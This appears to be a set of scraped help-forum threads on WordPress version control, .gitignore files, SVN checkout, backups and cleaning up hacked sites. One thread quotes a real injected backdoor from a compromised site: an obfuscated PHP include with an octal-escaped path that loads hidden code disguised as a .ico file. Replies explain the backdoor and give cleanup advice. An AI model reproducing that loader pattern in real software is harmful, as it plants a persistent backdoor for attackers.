Is it okay to put my wordpress config file (containing database name, username, password, etc.) on my GitHub repo if I'm using wordpress with my website? Or is it not secure? Why or why not?
If it's not secure, what steps can I take to not put on GitHub since it's public but at the same time be able to use GitHub as version control for my website and push files to the server?
No, I would not upload your config file to your repository. Unless it's private, but even then...use caution. As a best practice I only add the theme folder that I am working on into the repository, there really is no need to add Wordpress in its entirety to the repo.
To ignore that file when pushing to your repo add it to your .gitignore (https://help.github.com/articles/ignoring-files/) and it wont be added.
In addition to using .gitignore to keep your wp-config.php file out of your repo, you can also move it one directory above where you have WordPress installed and WordPress will look for it there.
Related
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
For the past 6 or so months I have been working on Laravel projects that are closer to web apps rather than full, content managed sites.
Recently I've started a Wordpress project and there's something that baffles me, how do you use Git with WordPress?
I ask because in Laravel you can basically push everything asides from node_modules, storage and the composer vendor folder.
I have also read that it is not a good idea to store wp-config in your repository, it's a strange one as Laravel uses an .env file to similar effect.
I found the following .gitignore
*.log
wp-config.php
wp-content/advanced-cache.php
wp-content/backup-db/
wp-content/backups/
wp-content/blogs.dir/
wp-content/cache/
wp-content/upgrade/
wp-content/uploads/
wp-content/mu-plugins/
wp-content/wp-cache-config.php
wp-content/plugins/hello.php
/.htaccess
/license.txt
/readme.html
/sitemap.xml
/sitemap.xml.gz
You can ignore almost everything with the following exceptions:
wp-content/themes/my-theme (your theme and/or child theme)
wp-content/plugins/my-custom-plugin. (any custom plugins you create)
Additionally, I have found two very good sources for gitignore files for WordPress. The first which is very straightforward is on gitignore.org and the second which is extremely surgical is by Sal Ferrarello and can be found here: https://salferrarello.com/wordpress-gitignore/
Just modify as required and of course, avoid the config.php. It has install specific info such as your database host & login which you may not want to expose to prying eyes.
Laravel's .env file contains sensitive data just as WP's wp-config.php so we don't usually push it into the repo.
As to how I use Git with WordPress:
I exclude the wp-config.php file, the developer cloning the repo doesn't need it anyways: they can fill in the credentials themselves when working on the project on their local development environment. Another good reason to leave this file out is you don't want to expose your site's details (host, database name, username, password, salts, etc) to the world.
I exclude the uploads folder. The reason is that while developing we usually add dummy images to our posts and pages, images that won't be used at all when the site is finally ready for production so there's no reason to "pollute" the repo with these.
One of the things I love about Laravel is that database changes can also be tracked thanks to migrations. WordPress, on the other hand, doesn't have anything like that so you'll have to find a plugin (or some other mean) to keep your local database in sync with the staging one.
Update:
Since you updated your question to ask which files should be specifically excluded from the Git repo, I think the ones you posted from that .gitignore file you found are good enough. I don't see the need to ignore the readme.txt file though but that won't do any harm either.
Where would I download Git on my Local Wordpress Environment So then I can create a branch and use it as a type of test environment. and have access to the other themes?
If you are looking to test plugins and themes, it's most likely that your working directory should be established in /wp-content - it contains both /plugins and /themes. You'll want to make sure you have a .gitignore file that only tracks what you're working on.
If you are looking to work on changes to core, your working directory will almost always be the top-most WordPress root. That way, you can track WordPress/WordPress.
Actually I put my GitHub folder in my themes folder and then I could use the repos in my GitHub folder on my local host WordPress site
i have a hosting where i put my domains files. i have one directory called wordpress where i installed a copy of wp. What i am trying to do is to do an SVN checkout on that folder.
but i get: Redirect cycle detected for URL '....
any ideas how to set it up so that i can grab those files on my computer and then checking them in after i make changes?
also, im not looking necessarily for something specific on wordpress, i might want to check out some other files lather on
thanks
You need to make sure that the folder you are trying to "checkout" is an actual SVN repository.
You can do so with the svnadmin create command. More info available here
My Wordpress blog appears to have been hacked and now blogs do not save and any changes I make such as approving a comment do not have effect. I am trying to backup my website so as to uninstall wordpress and perform a clean re-instillation. I want to create a backup so that when i restore the website will appear with everything the same as before: posts, images, links, colors, comments, themes, pages, etc. I have already backed up the MySQL database successfully. How do i backup the rest of the site.
Please tell me how to backup the site and also how to restore the site.
Thanks
You need to backup both your database and your Wordpress installation. The main resource to use for this is the Wordpress site:
http://codex.wordpress.org/WordPress_Backups
If you have phpmyadmin installed you can do a database dump from ther. If you don't have this installed then use mysqldump.
Wordpress installation backup can be initiated through the following URL:
http://[yourwordpressurl]/wp-admin/export.php
That will contain "your posts, pages, comments, custom fields, categories, and tags".
These links should get you started:
http://www.geeksaresexy.net/2008/01/29/how-to-backup-and-restore-your-wordpress-blog/
http://www.siteground.com/tutorials/wordpress/wordpress_backup.htm
http://codex.wordpress.org/WordPress_Backups
Good idea to look at FAQ: My site was hacked « WordPress Codex and How to Completely Clean a Hacked Wordpress Install.
best thing to do is to manually copy the database, as wordpress restore has an upload limit on the built in restore function. so if you've been blogging for a while, this can be really bad.
mysqldump -u yourUsername -p yourDatabaseName > databaseName.sql
will create the file databaseName.sql this is a full clone of all your database info (all your posts & wordpress configs)
then you can restore later with
mysql -u yourUsername -p yourDatabaseName < databaseName.sql
I figured it out. One way to cleanly install a new version of Wordpress but not lose your website is the use the Wordpress export feature as mentioned by Jon.
http://codex.wordpress.org/Tools_Export_SubPanel
This exports your blog to an XML file that contains all content of your site: posts, comments, authors, pages, etc. However, images do not go with. However when importing this XML file there is an option to download and import the attachments automatically which can be done if the original site is still online. So what I did is export my XML file, upload it to a wordpress blog installed on a subdomain automatically getting the attachments, then export an XML file from the subdomain to import into the actual wordpress site. This way my attachments were simply moved around from site to subdomain back to site. This made it easy because I did not have to handle backing up my attachments manually.
So what I did was back up my theme, export my blog to XML, then delete wordpress and my database then reinstall it with a new database on both my site and a subdomain of my site.
Then I imported my XML file and put my theme in the themes folder of the subdomain. Then I exported an XML file of this subdomain copy of my site and imported it into my real site. This made my blog have all the content correct and the theme right but none of the links, plugins, or colors correct. I then had to customize wordpress through the panel to get it back to the look and feel it was. For this It was lucky I had a stored copy of the site to refer to.
This process was long because I actually had to rebuild my site twice, one for the subdomain and then again for the actual thing. But it fixed my problems.
You can simply use EverLive.net. No need to install any plugin. No need for shell access. With this service you can simply make your wordpress website backup to the cloud. One-click restore option is also available wheneven you need to restore.